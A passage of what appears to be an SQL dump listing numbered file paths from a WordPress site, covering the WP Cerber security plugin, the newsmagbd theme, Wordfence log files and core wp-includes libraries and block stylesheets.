(1857,'wp-content/plugins/wp-cerber/cerber-lab.php'),(1858,'wp-content/plugins/wp-cerber/cerber-load.php'),(1859,'wp-content/plugins/wp-cerber/cerber-maintenance.php'),(1860,'wp-content/plugins/wp-cerber/cerber-pluggable.php'),(1861,'wp-content/plugins/wp-cerber/cerber-request.php'),(1862,'wp-content/plugins/wp-cerber/cerber-ripe.php'),(1863,'wp-content/plugins/wp-cerber/cerber-scanner.php'),(1864,'wp-content/plugins/wp-cerber/cerber-settings.php'),(1865,'wp-content/plugins/wp-cerber/cerber-whois.php'),(1866,'wp-content/plugins/wp-cerber/changelog.txt'),(1867,'wp-content/plugins/wp-cerber/index.php'),(1868,'wp-content/plugins/wp-cerber/jetflow.php'),(1869,'wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.mo'),(1870,'wp-content/plugins/wp-cerber/languages/wp-cerber-bs_BA.po'),(1871,'wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.mo'),(1872,'wp-content/plugins/wp-cerber/languages/wp-cerber-cs_CZ.po'),(1873,'wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.mo'),(1874,'wp-content/plugins/wp-cerber/languages/wp-cerber-de_CH.po'),(1875,'wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.mo'),(1876,'wp-content/plugins/wp-cerber/languages/wp-cerber-de_DE.po'),(1877,'wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.mo'),(1878,'wp-content/plugins/wp-cerber/languages/wp-cerber-es_ES.po'),(1879,'wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.mo'),(1880,'wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.po'),(1881,'wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.mo'),(1882,'wp-content/plugins/wp-cerber/languages/wp-cerber-fr_FR.po'),(1883,'wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.mo'),(1884,'wp-content/plugins/wp-cerber/languages/wp-cerber-it_IT.po'),(1885,'wp-content/plugins/wp-cerber/languages/wp-cerber-ja.mo'),(1886,'wp-content/plugins/wp-cerber/languages/wp-cerber-ja.po'),(1887,'wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.mo'),(1888,'wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.po'),(1889,'wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.mo'),(1890,'wp-content/plugins/wp-cerber/languages/wp-cerber-nb_NO.po'),(1891,'wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.mo'),(1892,'wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.po'),(1893,'wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.mo'),(1894,'wp-content/plugins/wp-cerber/languages/wp-cerber-pl_PL.po'),(1895,'wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.mo'),(1896,'wp-content/plugins/wp-cerber/languages/wp-cerber-pt_BR.po'),(1897,'wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.mo'),(1898,'wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.po'),(1899,'wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.mo'),(1900,'wp-content/plugins/wp-cerber/languages/wp-cerber-ru_RU.po'),(1901,'wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.mo'),(1902,'wp-content/plugins/wp-cerber/languages/wp-cerber-sr_RS.po'),(1903,'wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.mo'),(1904,'wp-content/plugins/wp-cerber/languages/wp-cerber-sv_SE.po'),(1905,'wp-content/plugins/wp-cerber/languages/wp-cerber-uk.mo'),(1906,'wp-content/plugins/wp-cerber/languages/wp-cerber-uk.po'),(1907,'wp-content/plugins/wp-cerber/languages/wp-cerber-vi.mo'),(1908,'wp-content/plugins/wp-cerber/languages/wp-cerber-vi.po'),(1909,'wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.mo'),(1910,'wp-content/plugins/wp-cerber/languages/wp-cerber-zh_CN.po'),(1911,'wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.mo'),(1912,'wp-content/plugins/wp-cerber/languages/wp-cerber-zh_TW.po'),(1913,'wp-content/plugins/wp-cerber/languages/wp-cerber.pot'),(1914,'wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php'),(1915,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php'),(1916,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php'),(1917,'wp-content/plugins/wp-cerber/nexus/cerber-nexus.php'),(1918,'wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php'),(1919,'wp-content/plugins/wp-cerber/readme.txt'),(1920,'wp-content/plugins/wp-cerber/wp-cerber.php'),(1921,'wp-content/themes/newsmagbd/404.php'),(1922,'wp-content/themes/newsmagbd/archive.php'),(1923,'wp-content/themes/newsmagbd/assets/images/846x450.png'),(1924,'wp-content/themes/newsmagbd/assets/newsmagbd.js'),(1925,'wp-content/themes/newsmagbd/assets/responsive.css'),(1926,'wp-content/themes/newsmagbd/comments.php'),(1927,'wp-content/themes/newsmagbd/footer.php'),(1928,'wp-content/themes/newsmagbd/functions.php'),(1929,'wp-content/themes/newsmagbd/header.php'),(1930,'wp-content/themes/newsmagbd/inc/core.php'),(1931,'wp-content/themes/newsmagbd/inc/customizer/assets/css/customizer-controll.css'),(1932,'wp-content/themes/newsmagbd/inc/customizer/assets/js/customizer-admin.js'),(1933,'wp-content/themes/newsmagbd/inc/customizer/core/control.php'),(1934,'wp-content/themes/newsmagbd/inc/customizer/core/customizer-core.php'),(1935,'wp-content/themes/newsmagbd/inc/customizer/core/customizer.php'),(1936,'wp-content/themes/newsmagbd/inc/customizer/core/default.php'),(1937,'wp-content/themes/newsmagbd/inc/customizer/core/sanitize.php'),(1938,'wp-content/themes/newsmagbd/inc/customizer/customizer.php'),(1939,'wp-content/themes/newsmagbd/inc/customizer/theme-option.php'),(1940,'wp-content/themes/newsmagbd/inc/filter.php'),(1941,'wp-content/themes/newsmagbd/inc/post_hooks.php'),(1942,'wp-content/themes/newsmagbd/inc/pro/message.css'),(1943,'wp-content/themes/newsmagbd/inc/pro/newsmagbd-admin-page.php'),(1944,'wp-content/themes/newsmagbd/inc/pro/welcome.css'),(1945,'wp-content/themes/newsmagbd/inc/template-tags.php'),(1946,'wp-content/themes/newsmagbd/inc/tgm/class-tgm-plugin-activation.php'),(1947,'wp-content/themes/newsmagbd/inc/tgm/loader.php'),(1948,'wp-content/themes/newsmagbd/inc/theme_function.php'),(1949,'wp-content/themes/newsmagbd/inc/theme_hook.php'),(1950,'wp-content/themes/newsmagbd/inc/wigets.php'),(1951,'wp-content/themes/newsmagbd/index.php'),(1952,'wp-content/themes/newsmagbd/page.php'),(1953,'wp-content/themes/newsmagbd/readme.txt'),(1954,'wp-content/themes/newsmagbd/rtl.css'),(1955,'wp-content/themes/newsmagbd/screenshot.png'),(1956,'wp-content/themes/newsmagbd/search.php'),(1957,'wp-content/themes/newsmagbd/sidebar.php'),(1958,'wp-content/themes/newsmagbd/single.php'),(1959,'wp-content/themes/newsmagbd/style.css'),(1960,'wp-content/themes/newsmagbd/template-parts/content-none.php'),(1961,'wp-content/themes/newsmagbd/template-parts/content-page.php'),(1962,'wp-content/themes/newsmagbd/template-parts/content-search.php'),(1963,'wp-content/themes/newsmagbd/template-parts/content.php'),(1964,'wp-content/themes/newsmagbd/template-parts/single/content.php'),(1965,'wp-content/themes/newsmagbd/vendors/bootstrap/bootstrap.css'),(1966,'wp-content/themes/newsmagbd/vendors/bootstrap/bootstrap.js'),(1967,'wp-content/themes/newsmagbd/vendors/breadcrumbs/breadcrumbs.php'),(1968,'wp-content/themes/newsmagbd/vendors/font-awesome/font-awesome.css'),(1969,'wp-content/themes/newsmagbd/vendors/jquery.bootstrap.newsbox.js'),(1970,'wp-content/themes/newsmagbd/vendors/magnific-popup/jquery.magnific-popup.js'),(1971,'wp-content/themes/newsmagbd/vendors/magnific-popup/magnific-popup.css'),(1972,'wp-content/themes/newsmagbd/vendors/normalize.css'),(1973,'wp-content/themes/newsmagbd/vendors/owl.carousel/owl.carousel.css'),(1974,'wp-content/themes/newsmagbd/vendors/owl.carousel/owl.carousel.js'),(1975,'wp-content/themes/newsmagbd/vendors/themify/themify-icons.css'),(1976,'wp-content/themes/newsmagbd/vendors/widget-helper/class-widget-helper.php'),(1977,'wp-content/themes/newsmagbd/vendors/wp-bootstrap-navwalker/wp-bootstrap-navwalker.php'),(1978,'wp-content/wflogs/attack-data.php'),(1979,'wp-content/wflogs/config-livewaf.php'),(1980,'wp-content/wflogs/config-synced.php'),(1981,'wp-content/wflogs/config-transient.php'),(1982,'wp-content/wflogs/config.php'),(1983,'wp-content/wflogs/ips.php'),(1984,'wp-content/wflogs/rules.php'),(1985,'wp-content/wflogs/template.php'),(1986,'wp-cron.php'),(1987,'wp-includes/ID3/getid3.lib.php'),(1988,'wp-includes/ID3/getid3.php'),(1989,'wp-includes/ID3/license.commercial.txt'),(1990,'wp-includes/ID3/license.txt'),(1991,'wp-includes/ID3/module.audio-video.asf.php'),(1992,'wp-includes/ID3/module.audio-video.flv.php'),(1993,'wp-includes/ID3/module.audio-video.matroska.php'),(1994,'wp-includes/ID3/module.audio-video.quicktime.php'),(1995,'wp-includes/ID3/module.audio-video.riff.php'),(1996,'wp-includes/ID3/module.audio.ac3.php'),(1997,'wp-includes/ID3/module.audio.dts.php'),(1998,'wp-includes/ID3/module.audio.flac.php'),(1999,'wp-includes/ID3/module.audio.mp3.php'),(2000,'wp-includes/ID3/module.audio.ogg.php'),(2001,'wp-includes/ID3/module.tag.apetag.php'),(2002,'wp-includes/ID3/module.tag.id3v1.php'),(2003,'wp-includes/ID3/module.tag.id3v2.php'),(2004,'wp-includes/ID3/module.tag.lyrics3.php'),(2005,'wp-includes/ID3/readme.txt'),(2006,'wp-includes/IXR/class-IXR-base64.php'),(2007,'wp-includes/IXR/class-IXR-client.php'),(2008,'wp-includes/IXR/class-IXR-clientmulticall.php'),(2009,'wp-includes/IXR/class-IXR-date.php'),(2010,'wp-includes/IXR/class-IXR-error.php'),(2011,'wp-includes/IXR/class-IXR-introspectionserver.php'),(2012,'wp-includes/IXR/class-IXR-message.php'),(2013,'wp-includes/IXR/class-IXR-request.php'),(2014,'wp-includes/IXR/class-IXR-server.php'),(2015,'wp-includes/IXR/class-IXR-value.php'),(2016,'wp-includes/PHPMailer/Exception.php'),(2017,'wp-includes/PHPMailer/PHPMailer.php'),(2018,'wp-includes/PHPMailer/SMTP.php'),(2019,'wp-includes/Requests/Auth/Basic.php'),(2020,'wp-includes/Requests/Auth.php'),(2021,'wp-includes/Requests/Cookie/Jar.php'),(2022,'wp-includes/Requests/Cookie.php'),(2023,'wp-includes/Requests/Exception/HTTP/304.php'),(2024,'wp-includes/Requests/Exception/HTTP/305.php'),(2025,'wp-includes/Requests/Exception/HTTP/306.php'),(2026,'wp-includes/Requests/Exception/HTTP/400.php'),(2027,'wp-includes/Requests/Exception/HTTP/401.php'),(2028,'wp-includes/Requests/Exception/HTTP/402.php'),(2029,'wp-includes/Requests/Exception/HTTP/403.php'),(2030,'wp-includes/Requests/Exception/HTTP/404.php'),(2031,'wp-includes/Requests/Exception/HTTP/405.php'),(2032,'wp-includes/Requests/Exception/HTTP/406.php'),(2033,'wp-includes/Requests/Exception/HTTP/407.php'),(2034,'wp-includes/Requests/Exception/HTTP/408.php'),(2035,'wp-includes/Requests/Exception/HTTP/409.php'),(2036,'wp-includes/Requests/Exception/HTTP/410.php'),(2037,'wp-includes/Requests/Exception/HTTP/411.php'),(2038,'wp-includes/Requests/Exception/HTTP/412.php'),(2039,'wp-includes/Requests/Exception/HTTP/413.php'),(2040,'wp-includes/Requests/Exception/HTTP/414.php'),(2041,'wp-includes/Requests/Exception/HTTP/415.php'),(2042,'wp-includes/Requests/Exception/HTTP/416.php'),(2043,'wp-includes/Requests/Exception/HTTP/417.php'),(2044,'wp-includes/Requests/Exception/HTTP/418.php'),(2045,'wp-includes/Requests/Exception/HTTP/428.php'),(2046,'wp-includes/Requests/Exception/HTTP/429.php'),(2047,'wp-includes/Requests/Exception/HTTP/431.php'),(2048,'wp-includes/Requests/Exception/HTTP/500.php'),(2049,'wp-includes/Requests/Exception/HTTP/501.php'),(2050,'wp-includes/Requests/Exception/HTTP/502.php'),(2051,'wp-includes/Requests/Exception/HTTP/503.php'),(2052,'wp-includes/Requests/Exception/HTTP/504.php'),(2053,'wp-includes/Requests/Exception/HTTP/505.php'),(2054,'wp-includes/Requests/Exception/HTTP/511.php'),(2055,'wp-includes/Requests/Exception/HTTP/Unknown.php'),(2056,'wp-includes/Requests/Exception/HTTP.php'),(2057,'wp-includes/Requests/Exception/Transport/cURL.php'),(2058,'wp-includes/Requests/Exception/Transport.php'),(2059,'wp-includes/Requests/Exception.php'),(2060,'wp-includes/Requests/Hooker.php'),(2061,'wp-includes/Requests/Hooks.php'),(2062,'wp-includes/Requests/IDNAEncoder.php'),(2063,'wp-includes/Requests/IPv6.php'),(2064,'wp-includes/Requests/IRI.php'),(2065,'wp-includes/Requests/Proxy/HTTP.php'),(2066,'wp-includes/Requests/Proxy.php'),(2067,'wp-includes/Requests/Response/Headers.php'),(2068,'wp-includes/Requests/Response.php'),(2069,'wp-includes/Requests/SSL.php'),(2070,'wp-includes/Requests/Session.php'),(2071,'wp-includes/Requests/Transport/cURL.php'),(2072,'wp-includes/Requests/Transport/fsockopen.php'),(2073,'wp-includes/Requests/Transport.php'),(2074,'wp-includes/Requests/Utility/CaseInsensitiveDictionary.php'),(2075,'wp-includes/Requests/Utility/FilteredIterator.php'),(2076,'wp-includes/SimplePie/Author.php'),(2077,'wp-includes/SimplePie/Cache/Base.php'),(2078,'wp-includes/SimplePie/Cache/DB.php'),(2079,'wp-includes/SimplePie/Cache/File.php'),(2080,'wp-includes/SimplePie/Cache/Memcache.php'),(2081,'wp-includes/SimplePie/Cache/Memcached.php'),(2082,'wp-includes/SimplePie/Cache/MySQL.php'),(2083,'wp-includes/SimplePie/Cache/Redis.php'),(2084,'wp-includes/SimplePie/Cache.php'),(2085,'wp-includes/SimplePie/Caption.php'),(2086,'wp-includes/SimplePie/Category.php'),(2087,'wp-includes/SimplePie/Content/Type/Sniffer.php'),(2088,'wp-includes/SimplePie/Copyright.php'),(2089,'wp-includes/SimplePie/Core.php'),(2090,'wp-includes/SimplePie/Credit.php'),(2091,'wp-includes/SimplePie/Decode/HTML/Entities.php'),(2092,'wp-includes/SimplePie/Enclosure.php'),(2093,'wp-includes/SimplePie/Exception.php'),(2094,'wp-includes/SimplePie/File.php'),(2095,'wp-includes/SimplePie/HTTP/Parser.php'),(2096,'wp-includes/SimplePie/IRI.php'),(2097,'wp-includes/SimplePie/Item.php'),(2098,'wp-includes/SimplePie/Locator.php'),(2099,'wp-includes/SimplePie/Misc.php'),(2100,'wp-includes/SimplePie/Net/IPv6.php'),(2101,'wp-includes/SimplePie/Parse/Date.php'),(2102,'wp-includes/SimplePie/Parser.php'),(2103,'wp-includes/SimplePie/Rating.php'),(2104,'wp-includes/SimplePie/Registry.php'),(2105,'wp-includes/SimplePie/Restriction.php'),(2106,'wp-includes/SimplePie/Sanitize.php'),(2107,'wp-includes/SimplePie/Source.php'),(2108,'wp-includes/SimplePie/XML/Declaration/Parser.php'),(2109,'wp-includes/SimplePie/gzdecode.php'),(2110,'wp-includes/Text/Diff/Engine/native.php'),(2111,'wp-includes/Text/Diff/Engine/shell.php'),(2112,'wp-includes/Text/Diff/Engine/string.php'),(2113,'wp-includes/Text/Diff/Engine/xdiff.php'),(2114,'wp-includes/Text/Diff/Renderer/inline.php'),(2115,'wp-includes/Text/Diff/Renderer.php'),(2116,'wp-includes/Text/Diff.php'),(2117,'wp-includes/admin-bar.php'),(2118,'wp-includes/assets/script-loader-packages.php'),(2119,'wp-includes/atomlib.php'),(2120,'wp-includes/author-template.php'),(2121,'wp-includes/block-editor.php'),(2122,'wp-includes/block-patterns/query-grid-posts.php'),(2123,'wp-includes/block-patterns/query-large-title-posts.php'),(2124,'wp-includes/block-patterns/query-medium-posts.php'),(2125,'wp-includes/block-patterns/query-offset-posts.php'),(2126,'wp-includes/block-patterns/query-small-posts.php'),(2127,'wp-includes/block-patterns/query-standard-posts.php'),(2128,'wp-includes/block-patterns/social-links-shared-background-color.php'),(2129,'wp-includes/block-patterns.php'),(2130,'wp-includes/block-supports/align.php'),(2131,'wp-includes/block-supports/border.php'),(2132,'wp-includes/block-supports/colors.php'),(2133,'wp-includes/block-supports/custom-classname.php'),(2134,'wp-includes/block-supports/duotone.php'),(2135,'wp-includes/block-supports/elements.php'),(2136,'wp-includes/block-supports/generated-classname.php'),(2137,'wp-includes/block-supports/layout.php'),(2138,'wp-includes/block-supports/spacing.php'),(2139,'wp-includes/block-supports/typography.php'),(2140,'wp-includes/block-template-utils.php'),(2141,'wp-includes/block-template.php'),(2142,'wp-includes/blocks/archives/block.json'),(2143,'wp-includes/blocks/archives/editor-rtl.css'),(2144,'wp-includes/blocks/archives/editor-rtl.min.css'),(2145,'wp-includes/blocks/archives/editor.css'),(2146,'wp-includes/blocks/archives/editor.min.css'),(2147,'wp-includes/blocks/archives.php'),(2148,'wp-includes/blocks/audio/block.json'),(2149,'wp-includes/blocks/audio/editor-rtl.css'),(2150,'wp-includes/blocks/audio/editor-rtl.min.css'),(2151,'wp-includes/blocks/audio/editor.css'),(2152,'wp-includes/blocks/audio/editor.min.css'),(2153,'wp-includes/blocks/audio/style-rtl.css'),(2154,'wp-includes/blocks/audio/style-rtl.min.css'),(2155,'wp-includes/blocks/audio/style.css'),(2156,'wp-includes/blocks/audio/style.min.css'),(2157,'wp-includes/blocks/block/block.json'),(2158,'wp-includes/blocks/block/editor-rtl.css'),(2159,'wp-includes/blocks/block/editor-rtl.min.css'),(2160,'wp-includes/blocks/block/editor.css'),(2161,'wp-includes/blocks/block/editor.min.css'),(2162,'wp-includes/blocks/block.php'),(2163,'wp-includes/blocks/button/block.json'),(2164,'wp-includes/blocks/button/editor-rtl.css'),(2165,'wp-includes/blocks/button/editor-rtl.min.css'),(2166,'wp-includes/blocks/button/editor.css'),(2167,'wp-includes/blocks/button/editor.min.css'),(2168,'wp-includes/blocks/button/style-rtl.css'),(2169,'wp-includes/blocks/button/style-rtl.min.css'),(2170,'wp-includes/blocks/button/style.css'),(2171,'wp-includes/blocks/button/style.min.css'),(2172,'wp-includes/blocks/buttons/block.json'),(2173,'wp-includes/blocks/buttons/editor-rtl.css'),(2174,'wp-includes/blocks/buttons/editor-rtl.min.css'),(2175,'wp-includes/blocks/buttons/editor.css'),(2176,'wp-includes/blocks/buttons/editor.min.css'),(2177,'wp-includes/blocks/buttons/style-rtl.css'),(2178,'wp-includes/blocks/buttons/style-rtl.min.css'),(2179,'wp-includes/blocks/buttons/style.css'),(2180,'wp-includes/blocks/buttons/style.min.css'),(2181,'wp-includes/blocks/calendar/block.json'),(2182,'wp-includes/blocks/calendar/style-rtl.css'),(2183,'wp-includes/blocks/calendar/style-rtl.min.css'),(2184,'wp-includes/blocks/calendar/style.css'),(2185,'wp-includes/blocks/calendar/style.min.css'),(2186,'wp-includes/blocks/calendar.php'),(2187,'wp-includes/blocks/categories/block.json'),(2188,'wp-includes/blocks/categories/editor-rtl.css'),(2189,'wp-includes/blocks/categories/editor-rtl.min.css'),(2190,'wp-includes/blocks/categories/editor.css'),(2191,'wp-includes/blocks/categories/editor.min.css'),(2192,'wp-includes/blocks/categories/style-rtl.css'),(2193,'wp-includes/blocks/categories/style-rtl.min.css'),(2194,'wp-includes/blocks/categories/style.css'),(2195,'wp-includes/blocks/categories/style.min.css'),(2196,'wp-includes/blocks/categories.php'),(2197,'wp-includes/blocks/code/block.json'),(2198,'wp-includes/blocks/code/style-rtl.css'),(2199,'wp-includes/blocks/code/style-rtl.min.css'),(2200,'wp-includes/blocks/code/style.css'),(2201,'wp-includes/blocks/code/style.min.css'),(2202,'wp-includes/blocks/column/block.json'),(2203,'wp-includes/blocks/columns/block.json'),(2204,'wp-includes/blocks/columns/editor-rtl.css'),(2205,'wp-includes/blocks/columns/editor-rtl.min.css'),(2206,'wp-includes/blocks/columns/editor.css'),(2207,'wp-includes/blocks/columns/editor.min.css'),(2208,'wp-includes/blocks/columns/style-rtl.css'),(2209,'wp-includes/blocks/columns/style-rtl.min.css'),(2210,'wp-includes/blocks/columns/style.css'),(2211,'wp-includes/blocks/columns/style.min.css'),(2212,'wp-includes/blocks/cover/block.json'),(2213,'wp-includes/blocks/cover/editor-rtl.css'),(2214,'wp-includes/blocks/cover/editor-rtl.min.css'),(2215,'wp-includes/blocks/cover/editor.css'),(2216,'wp-includes/blocks/cover/editor.min.css'),(2217,'wp-includes/blocks/cover/style-rtl.css'),(2218,'wp-includes/blocks/cover/style-rtl.min.css'),(2219,'wp-includes/blocks/cover/style.css'),(2220,'wp-includes/blocks/cover/style.min.css'),(2221,'wp-includes/blocks/embed/block.json'),(2222,'wp-includes/blocks/embed/editor-rtl.css'),(2223,'wp-includes/blocks/embed/editor-rtl.min.css'),(2224,'wp-includes/blocks/embed/editor.css'),(2225,'wp-includes/blocks/embed/editor.min.css'),(2226,'wp-includes/blocks/embed/style-rtl.css'),(2227,'wp-includes/blocks/embed/style-rtl.min.css'),(2228,'wp-includes/blocks/embed/style.css'),(2229,'wp-includes/blocks/embed/style.min.css'),(2230,'wp-includes/blocks/file/block.json'),(2231,'wp-includes/blocks/file/editor-rtl.css'),(2232,'wp-includes/blocks/file/editor-rtl.min.css'),(2233,'wp-includes/blocks/file/editor.css'),(2234,'wp-includes/blocks/file/editor.min.css'),(2235,'wp-includes/blocks/file/style-rtl.css'),(2236,'wp-includes/blocks/file/style-rtl.min.css'),(2237,'wp-includes/blocks/file/style.css'),(2238,'wp-includes/blocks/file/style.min.css'),(2239,'wp-includes/blocks/file.php'),(2240,'wp-includes/blocks/freeform/block.json'),(2241,'wp-includes/blocks/freeform/editor-rtl.css'),(2242,'wp-includes/blocks/freeform/editor-rtl.min.css'),(2243,'wp-includes/blocks/freeform/editor.css'),(2244,'wp-includes/blocks/freeform/editor.min.css'),(2245,'wp-includes/blocks/gallery/block.json'),(2246,'wp-includes/blocks/gallery/editor-rtl.css'),(2247,'wp-includes/blocks/gallery/editor-rtl.min.css'),(2248,'wp-includes/blocks/gallery/editor.css'),(2249,'wp-includes/blocks/gallery/editor.min.css'),(2250,'wp-includes/blocks/gallery/style-rtl.css'),(2251,'wp-includes/blocks/gallery/style-rtl.min.css'),(2252,'wp-includes/blocks/gallery/style.css'),(2253,'wp-includes/blocks/gallery/style.min.css'),(2254,'wp-includes/blocks/group/block.json'),(2255,'wp-includes/blocks/group/editor-rtl.css'),(2256,'wp-includes/blocks/group/editor-rtl.min.css'),(2257,'wp-includes/blocks/group/editor.css'),(2258,'wp-includes/blocks/group/editor.min.css'),(2259,'wp-includes/blocks/group/style-rtl.css'),(2260,'wp-includes/blocks/group/style-rtl.min.css'),(2261,'wp-includes/blocks/group/style.css'),(2262,'wp-includes/blocks/group/style.min.css'),(2263,'wp-includes/blocks/heading/block.json'),(2264,'wp-includes/blocks/heading/editor-rtl.css'),(2265,'wp-includes/blocks/heading/editor-rtl.min.css'),(2266,'wp-includes/blocks/heading/editor.css'),(2267,'wp-includes/blocks/heading/editor.min.css'),(2268,'wp-includes/blocks/heading/style-rtl.css'),(2269,'wp-includes/blocks/heading/style-rtl.min.css'),(2270,'wp-includes/blocks/heading/style.css'),(2271,'wp-includes/blocks/heading/style.min.css'),(2272,'wp-includes/blocks/html/block.json'),(2273,'wp-includes/blocks/html/editor-rtl.css'),(2274,'wp-includes/blocks/html/editor-rtl.min.css'),(2275,'wp-includes/blocks/html/editor.css'),(2276,'wp-includes/blocks/html/editor.min.css'),(2277,'wp-includes/blocks/image/block.json'),(2278,'wp-includes/blocks/image/editor-rtl.css'),(2279,'wp-includes/blocks/image/editor-rtl.min.css'),(2280,'wp-includes/blocks/image/editor.css'),(2281,'wp-includes/blocks/image/editor.min.css'),(2282,'wp-includes/blocks/image/style-rtl.css'),(2283,'wp-includes/blocks/image/style-rtl.min.css'),(2284,'wp-includes/blocks/image/style.css'),(2285,'wp-includes/blocks/image/style.min.css'),(2286,'wp-includes/blocks/index.php'),(2287,'wp-includes/blocks/latest-comments/block.json'),(2288,'wp-includes/blocks/latest-comments/style-rtl.css'),(2289,'wp-includes/blocks/latest-comments/style-rtl.min.css'),(2290,'wp-includes/blocks/latest-comments/style.css'),(2291,'wp-includes/blocks/latest-comments/style.min.css'),(2292,'wp-includes/blocks/latest-comments.php'),(2293,'wp-includes/blocks/latest-posts/block.json'),(2294,'wp-includes/blocks/latest-posts/editor-rtl.css'),(2295,'wp-includes/blocks/latest-posts/editor-rtl.min.css'),(2296,'wp-includes/blocks/latest-posts/editor.css'),(2297,'wp-includes/blocks/latest-posts/editor.min.css'),(2298,'wp-includes/blocks/latest-posts/style-rtl.css'),(2299,'wp-includes/blocks/latest-posts/style-rtl.min.css'),(2300,'wp-includes/blocks/latest-posts/style.css'),(2301,'wp-includes/blocks/latest-posts/style.min.css'),(2302,'wp-includes/blocks/latest-posts.php'),(2303,'wp-includes/blocks/legacy-widget/block.json'),(2304,'wp-includes/blocks/legacy-widget.php'),(2305,'wp-includes/blocks/list/block.json'),(2306,'wp-includes/blocks/list/style-rtl.css'),(2307,'wp-includes/blocks/list/style-rtl.min.css'),(2308,'wp-includes/blocks/list/style.css'),(2309,'wp-includes/blocks/list/style.min.css'),(2310,'wp-includes/blocks/loginout/block.json'),(2311,'wp-includes/blocks/loginout.php'),(2312,'wp-includes/blocks/media-text/block.json'),(2313,'wp-includes/blocks/media-text/editor-rtl.css'),(2314,'wp-includes/blocks/media-text/editor-rtl.min.css'),(2315,'wp-includes/blocks/media-text/editor.css'),(2316,'wp-includes/blocks/media-text/editor.min.css'),(2317,'wp-includes/blocks/media-text/style-rtl.css'),(2318,'wp-includes/blocks/media-text/style-rtl.min.css'),(2319,'wp-includes/blocks/media-text/style.css'),(2320,'wp-includes/blocks/media-text/style.min.css'),(2321,'wp-includes/blocks/missing/block.json'),(2322,'wp-includes/blocks/more/block.json'),(2323,'wp-includes/blocks/more/editor-rtl.css'),(2324,'wp-includes/blocks/more/editor-rtl.min.css'),(2325,'wp-includes/blocks/more/editor.css'),(2326,'wp-includes/blocks/more/editor.min.css'),(2327,'wp-includes/blocks/nextpage/block.json'),(2328,'wp-includes/blocks/nextpage/editor-rtl.css'),(2329,'wp-includes/blocks/nextpage/editor-rtl.min.css'),(2330,'wp-includes/blocks/nextpage/editor.css'),(2331,'wp-includes/blocks/nextpage/editor.min.css'),(2332,'wp-includes/blocks/page-list/block.json'),(2333,'wp-includes/blocks/page-list/editor-rtl.css'),(2334,'wp-includes/blocks/page-list/editor-rtl.min.css'),(2335,'wp-includes/blocks/page-list/editor.css'),(2336,'wp-includes/blocks/page-list/editor.min.css'),(2337,'wp-includes/blocks/page-list/style-rtl.css'),(2338,'wp-includes/blocks/page-list/style-rtl.min.css'),(2339,'wp-includes/blocks/page-list/style.css'),(2340,'wp-includes/blocks/page-list/style.min.css'),(2341,'wp-includes/blocks/page-list.php'),(2342,'wp-includes/blocks/paragraph/block.json'),(2343,'wp-includes/blocks/paragraph/editor-rtl.css'),(2344,'wp-includes/blocks/paragraph/editor-rtl.min.css'),(2345,'wp-includes/blocks/paragraph/editor.css'),(2346,'wp-includes/blocks/paragraph/editor.min.css'),(2347,'wp-includes/blocks/paragraph/style-rtl.css'),(2348,'wp-includes/blocks/paragraph/style-rtl.min.css'),(2349,'wp-includes/blocks/paragraph/style.css'),(2350,'wp-includes/blocks/paragraph/style.min.css'),(2351,'wp-includes/blocks/post-content/block.json'),(2352,'wp-includes/blocks/post-content/editor-rtl.css'),(2353,'wp-includes/blocks/post-content/editor-rtl.min.css'),(2354,'wp-includes/blocks/post-content/editor.css'),(2355,'wp-includes/blocks/post-content/editor.min.css'),(2356,'wp-includes/blocks/post-content.php'),(2357,'wp-includes/blocks/post-date/block.json'),(2358,'wp-includes/blocks/post-date.php'),(2359,'wp-includes/blocks/post-excerpt/block.json'),(2360,'wp-includes/blocks/post-excerpt/editor-rtl.css'),(2361,'wp-includes/blocks/post-excerpt/editor-rtl.min.css'),(2362,'wp-includes/blocks/post-excerpt/editor.css'),(2363,'wp-includes/blocks/post-excerpt/editor.min.css'),(2364,'wp-includes/blocks/post-excerpt/style-rtl.css'),(2365,'wp-includes/blocks/post-excerpt/style-rtl.min.css'),(2366,'wp-includes/blocks/post-excerpt/style.css'),(2367,'wp-includes/blocks/post-excerpt/style.min.css'),(2368,'wp-includes/blocks/post-excerpt.php'),(2369,'wp-includes/blocks/post-featured-image/block.json'),(2370,'wp-includes/blocks/post-featured-image/editor-rtl.css'),(2371,'wp-includes/blocks/post-featured-image/editor-rtl.min.css'),(2372,'wp-includes/blocks/post-featured-image/editor.css'),(2373,'wp-includes/blocks/post-featured-image/editor.min.css'),(2374,'wp-includes/blocks/post-featured-image/style-rtl.css'),(2375,'wp-includes/blocks/post-featured-image/style-rtl.min.css'),(2376,'wp-includes/blocks/post-featured-image/style.css'),(2377,'wp-includes/blocks/post-featured-image/style.min.css'),(2378,'wp-includes/blocks/post-featured-image.php'),(2379,'wp-includes/blocks/post-template/block.json'),(2380,'wp-includes/blocks/post-template/editor-rtl.css'),(2381,'wp-includes/blocks/post-template/editor-rtl.min.css'),(2382,'wp-includes/blocks/post-template/editor.css'),(2383,'wp-includes/blocks/post-template/editor.min.css'),(2384,'wp-includes/blocks/post-template/style-rtl.css'),(2385,'wp-includes/blocks/post-template/style-rtl.min.